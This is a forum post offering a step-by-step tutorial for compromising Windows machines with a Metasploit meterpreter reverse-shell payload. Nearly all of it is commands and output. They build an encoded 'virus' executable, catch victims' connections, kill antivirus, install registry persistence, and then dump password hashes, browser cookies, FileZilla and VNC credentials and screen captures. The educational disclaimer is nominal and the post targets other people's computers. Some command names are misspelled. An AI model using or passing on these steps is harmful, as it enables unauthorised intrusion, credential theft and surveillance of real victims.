Search the Community

This is a tutorial about how to hack Windows from version XP to 8.1(10??) from all around the world . THIS IS A COMPLETE TUTORIAL WITH ALL THE THINGS YOU COULD WISH FOR This tutorial is strictly for educational purposes only, I am not responsible for any of the action you may take upon others. Follow my steps ! Step 1 : Install Kali Linux (Backtrack's exploits,payloads etc are outdated) . Step 2 : Open a Terminal (Or Terminator) . Step 3 : Type these commands : apt-get update msfconsole use windows/meterpreter/reverse_tcp show options Now this will show up : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique LHOST yes The listen address LPORT 4444 yes The listen port set LHOST YourPublicIP #hack out of your LAN or set LHOST YourLanIP #hack in your LAN ex for out-of-lan : set LHOST 106.102.246.23 or ex for in-lan : set LHOST 192.168.100.4 show encoders #find yourself a encoder generate -t exe -f virusexe -e thenameofencoder use exploit/multi/handler set LHOST yourlanip #ONLY YOUR LAN IP set ExitOnSession false #so you can get many others connections set PAYLOAD windows/meterpreter/reverse_tcp Now there's a thing that you're gonna need to do : Port-forwarding. Port Forward port 4444 or what port you chose. exploit -z -j After your victim ran the virus you should get this message in your terminal : [*] Sending stage (885806 bytes) to 79.112.31.18 (or whatever the victim's ip is) [*] Meterpreter session 2 opened (192.168.100.5:4444 -> 79.112.31.18:4983) at DATE run killav ps migrate id #migrate to a process run persistence -X -i 30 -p 4444 -r yourpublicipaddress/yourlanipaddress or run persistence -U -i 30 -p 4444 -r yourpublicipaddress/youtlanipaddress #if you don't know what these -u,-x etc mean type in run persistence -h #remember if you don't understand something always type in name -h then ask questions. Something like this will show up : [*] Running Persistence .... [*] Resource file for cleanup created at .... [*] Creating Payload= .... [*] Persistent agent script is 123456 bytes long.... [+] Persistent Script written to .... [*] Executing script .... [+] Agent executed with PID 4504 .... [*] Installing into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end [+] Installed into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end reg queryval -k HKCL\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end or reg queryval -k HKCU\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end Useful commands (Not neccesary) : help #find here awesome commands run duplicate #you can run this so you can duplicate your meterpreter session if you execute risky commands your session might pe killed by the AV run enum_chrome #download cookies,history,web data etc of your victim's Google Chrome run enum_firefox #same but for firefox run enum_putty #see putty connections run get_application_list #get all names of the apps installed on victim's PC run getcountermeasure #checks for firewall,antivirus and stuff run get_env #extracts a list of all system and user environments variables run getfilezillacreds #you know what this does cmon run getgui #enables windows RDP run get_local_subnets #gets a list of local subnets run gettelnet #checks if the telnet is installed run getvncpasswors #gets vnc passwordsduuuh ? run hashdump #gets pasword hashes from SAM run multicommand #you can run multiple commands on host run multi_console_command #run multiple console commands on a meterpreter session run multi_meter_inject #you know what this does run packetrecorder #captures packets into PCAP files run prefetchtool #extracts info for prefetch folder run schelevator # exploit for windows privilege escalation and task scheduler 20 xml 0day by STUXNET run scraper #obtain system info from victim run screenspy #spies screen duuuh ??? run virtualbox_sysenter_dos #dos virtual box run birusscan_bypass #kills mcaffe virusscan v870i+ procceses This is Original Contnent If it's not Original Contnent i asume my fault. I haven't seen any thread about this before. Use this for legal purposes. If this is used for illegal purposes it's not my fault it's only yours.